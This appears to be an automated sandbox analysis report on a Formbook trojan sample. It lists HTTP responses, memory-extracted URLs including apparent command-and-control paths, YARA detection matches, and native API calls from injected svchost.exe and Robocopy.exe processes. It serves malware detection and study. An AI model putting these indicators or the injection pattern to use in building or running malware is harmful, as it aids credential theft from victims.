            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Fri, 27 Sep 2024 15:30:37 GMT
            Content-Type: text/html
            Content-Length: 146
            Connection: close
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Fri, 27 Sep 2024 15:30:39 GMT
            Content-Type: text/html
            Content-Length: 146
            Connection: close
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Fri, 27 Sep 2024 15:30:46 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6aXeM3MhiMSMnaUiXyy%2FWaGoGavnfbXxkPxmI9wQw7H3zgj9mXmFFwQVlcdcc%2B728iYBeObpIDAnQoB2wb6YqEK6odhz%2FM4Oxdc5%2FR6kXPC5Pyvw8Vmqmw9jpc2RoBB5lemxPg%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8c9c896c7a1f4213-EWR
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Fri, 27 Sep 2024 15:30:48 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I6caT3V9PUjdDFr7KSnkRmMYcOmPRirgmFmZ7F5YR7XtMVz%2FdnZVdVzDY1KWArZkw4%2BAhZTOroSyr8AQVrC6QxM25lpRCBsxV1G5MHvGmlJ38dTxkmjl1P0npITEpWF9m2FLOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8c9c897c8905430d-EWR
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Fri, 27 Sep 2024 15:30:51 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dWHQVjxtLPBV%2BAEKFjoR8OkKv1BdvDYU6xxAY8%2BsMqMTf649w1yvfFdYe5SOsdmh1Ak19jJDL9RrPEzFsh4Df6%2FAWLA86jqJNoqSo61JkeNqy8KWuwb7M8hA%2BPBWGiMBrNvasg%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8c9c898c2947c436-EWR
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Fri, 27 Sep 2024 15:30:54 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fGHQt%2Fn4mIQJsdIoR5kriFbshWEY0VR0Qg7LGnSkF0v4q2o0Kd7va7Ne6pdqHRvUYuc9x1Yu2jn2QMnI3I6pVl1XazmJ1Vw8zjCE%2BR5zqfSlSdzlnnm9W7q0YF9rCaq%2FEMt30g%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Speculation-Rules: "/cdn-cgi/speculation"
            Server: cloudflare
            CF-RAY: 8c9c899c294942ea-EWR
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Fri, 27 Sep 2024 15:31:16 GMT
            Server: Apache
            Content-Length: 389
            Connection: close
            Content-Type: text/html
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Fri, 27 Sep 2024 15:31:19 GMT
            Server: Apache
            Content-Length: 389
            Connection: close
            Content-Type: text/html
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Fri, 27 Sep 2024 15:31:21 GMT
            Server: Apache
            Content-Length: 389
            Connection: close
            Content-Type: text/html
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Fri, 27 Sep 2024 15:31:24 GMT
            Server: Apache
            Content-Length: 389
            Connection: close
            Content-Type: text/html; charset=utf-8
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx/1.14.1
            Date: Fri, 27 Sep 2024 15:31:50 GMT
            Content-Length: 0
            Connection: close
            X-Rate-Limit-Limit: 5s
            X-Rate-Limit-Remaining: 19
            X-Rate-Limit-Reset: 2024-09-27T15:31:55.8118827Z
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Fri, 27 Sep 2024 15:31:57 GMT
            Content-Type: text/html; charset=iso-8859-1
            Transfer-Encoding: chunked
            Connection: close
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Fri, 27 Sep 2024 15:31:59 GMT
            Content-Type: text/html; charset=iso-8859-1
            Transfer-Encoding: chunked
            Connection: close
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Fri, 27 Sep 2024 15:32:02 GMT
            Content-Type: text/html; charset=iso-8859-1
            Transfer-Encoding: chunked
            Connection: close
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Fri, 27 Sep 2024 15:32:04 GMT
            Content-Type: text/html; charset=iso-8859-1
            Content-Length: 196
            Connection: close
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/29590/bg1.png)
            Source: Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/8934/rcomlogo.jpg
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Alphaaistore.com
            Source: Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Martaschrimpf.info
            Source: HoiWfznxKU.exe, 00000006.00000002.3987877558.0000000004E9E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.alphaaistore.com
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.alphaaistore.com/Alpha.cfm?fp=ptQ1PhmefSIPL%2BuLjwFIjR1UQknnb2Bgv3CJh%2BHmStYCNq%2BtSB73n
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.alphaaistore.com/Christian_Private_Schools.cfm?fp=ptQ1PhmefSIPL%2BuLjwFIjR1UQknnb2Bgv3CJh
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.alphaaistore.com/Christian_Website.cfm?fp=ptQ1PhmefSIPL%2BuLjwFIjR1UQknnb2Bgv3CJh%2BHmStY
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.alphaaistore.com/Church_Video.cfm?fp=ptQ1PhmefSIPL%2BuLjwFIjR1UQknnb2Bgv3CJh%2BHmStYCNq%2
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.alphaaistore.com/The_Christian_Faith.cfm?fp=ptQ1PhmefSIPL%2BuLjwFIjR1UQknnb2Bgv3CJh%2BHmS
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.alphaaistore.com/__media__/js/trademark.php?d=alphaaistore.com&type=dflt
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.alphaaistore.com/display.cfm
            Source: HoiWfznxKU.exe, 00000006.00000002.3987877558.0000000004E9E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.alphaaistore.com/xf5b/
            Source: Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.martaschrimpf.info/Buy_Music_Online.cfm?fp=pO0JpCU5Mh6f5g1arwsF3FAaMtZCoz%2F4No65eqcRoFM4
            Source: Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.martaschrimpf.info/Matt_Schrimpf.cfm?fp=pO0JpCU5Mh6f5g1arwsF3FAaMtZCoz%2F4No65eqcRoFM4S68
            Source: Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.martaschrimpf.info/Music_Production_Schools.cfm?fp=pO0JpCU5Mh6f5g1arwsF3FAaMtZCoz%2F4No65
            Source: Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.martaschrimpf.info/Music_Video_Production.cfm?fp=pO0JpCU5Mh6f5g1arwsF3FAaMtZCoz%2F4No65eq
            Source: Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.martaschrimpf.info/Schrimpf.cfm?fp=pO0JpCU5Mh6f5g1arwsF3FAaMtZCoz%2F4No65eqcRoFM4S6840KTg
            Source: Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.martaschrimpf.info/__media__/design/underconstructionnotice.php?d=martaschrimpf.info
            Source: Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.martaschrimpf.info/__media__/js/trademark.php?d=martaschrimpf.info&type=ns
            Source: Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.martaschrimpf.info/display.cfm
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.register.com/?trkID=WSTm3u15CW
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.register.com?trkID=WSTm3u15CW
            Source: Robocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
            Source: Robocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Robocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Robocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
            Source: HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
            Source: Robocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Robocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Robocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: Robocopy.exe, 00000004.00000002.3985211901.0000000002D4F000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3985211901.0000000002D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: Robocopy.exe, 00000004.00000002.3985211901.0000000002D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: Robocopy.exe, 00000004.00000002.3985211901.0000000002D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: Robocopy.exe, 00000004.00000002.3985211901.0000000002D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: Robocopy.exe, 00000004.00000002.3985211901.0000000002D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033L
            Source: Robocopy.exe, 00000004.00000002.3985211901.0000000002D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: Robocopy.exe, 00000004.00000002.3985211901.0000000002D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: Robocopy.exe, 00000004.00000003.2452211637.00000000079A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: Robocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.register.com/whois.rcmx?domainName=Alphaaistore.com

            E-Banking Fraud

            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3984885805.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2272902332.0000000000C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3985113849.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3986045977.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2275425308.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3986013036.0000000002C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3984885805.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2272902332.0000000000C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3985113849.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3986045977.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2275425308.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3986013036.0000000002C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042CE13 NtClose,2_2_0042CE13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk,2_2_030735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B60 NtClose,LdrInitializeThunk,2_2_03072B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03072DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074340 NtSetContextThread,2_2_03074340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073010 NtOpenDirectoryObject,2_2_03073010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073090 NtSetValueKey,2_2_03073090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074650 NtSuspendThread,2_2_03074650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B80 NtQueryInformationFile,2_2_03072B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BA0 NtEnumerateValueKey,2_2_03072BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BE0 NtQueryValueKey,2_2_03072BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BF0 NtAllocateVirtualMemory,2_2_03072BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AB0 NtWaitForSingleObject,2_2_03072AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AD0 NtReadFile,2_2_03072AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AF0 NtWriteFile,2_2_03072AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030739B0 NtGetContextThread,2_2_030739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F30 NtCreateSection,2_2_03072F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F60 NtCreateProcessEx,2_2_03072F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F90 NtProtectVirtualMemory,2_2_03072F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FA0 NtQuerySection,2_2_03072FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FB0 NtResumeThread,2_2_03072FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FE0 NtCreateFile,2_2_03072FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E30 NtWriteVirtualMemory,2_2_03072E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E80 NtReadVirtualMemory,2_2_03072E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EA0 NtAdjustPrivilegesToken,2_2_03072EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EE0 NtQueueApcThread,2_2_03072EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D00 NtSetInformationFile,2_2_03072D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D10 NtMapViewOfSection,2_2_03072D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D10 NtOpenProcessToken,2_2_03073D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D30 NtUnmapViewOfSection,2_2_03072D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D70 NtOpenThread,2_2_03073D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DB0 NtEnumerateKey,2_2_03072DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DD0 NtDelayExecution,2_2_03072DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C00 NtQueryInformationProcess,2_2_03072C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C60 NtCreateKey,2_2_03072C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C70 NtFreeVirtualMemory,2_2_03072C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CA0 NtQueryInformationToken,2_2_03072CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CC0 NtQueryVirtualMemory,2_2_03072CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CF0 NtOpenProcess,2_2_03072CF0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048335C0 NtCreateMutant,LdrInitializeThunk,4_2_048335C0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04834650 NtSuspendThread,LdrInitializeThunk,4_2_04834650
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04834340 NtSetContextThread,LdrInitializeThunk,4_2_04834340
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_04832CA0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832C60 NtCreateKey,LdrInitializeThunk,4_2_04832C60
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04832C70
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832DD0 NtDelayExecution,LdrInitializeThunk,4_2_04832DD0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_04832DF0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832D10 NtMapViewOfSection,LdrInitializeThunk,4_2_04832D10
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_04832D30
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_04832E80
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832EE0 NtQueueApcThread,LdrInitializeThunk,4_2_04832EE0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832FB0 NtResumeThread,LdrInitializeThunk,4_2_04832FB0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832FE0 NtCreateFile,LdrInitializeThunk,4_2_04832FE0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832F30 NtCreateSection,LdrInitializeThunk,4_2_04832F30
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048339B0 NtGetContextThread,LdrInitializeThunk,4_2_048339B0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832AD0 NtReadFile,LdrInitializeThunk,4_2_04832AD0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832AF0 NtWriteFile,LdrInitializeThunk,4_2_04832AF0
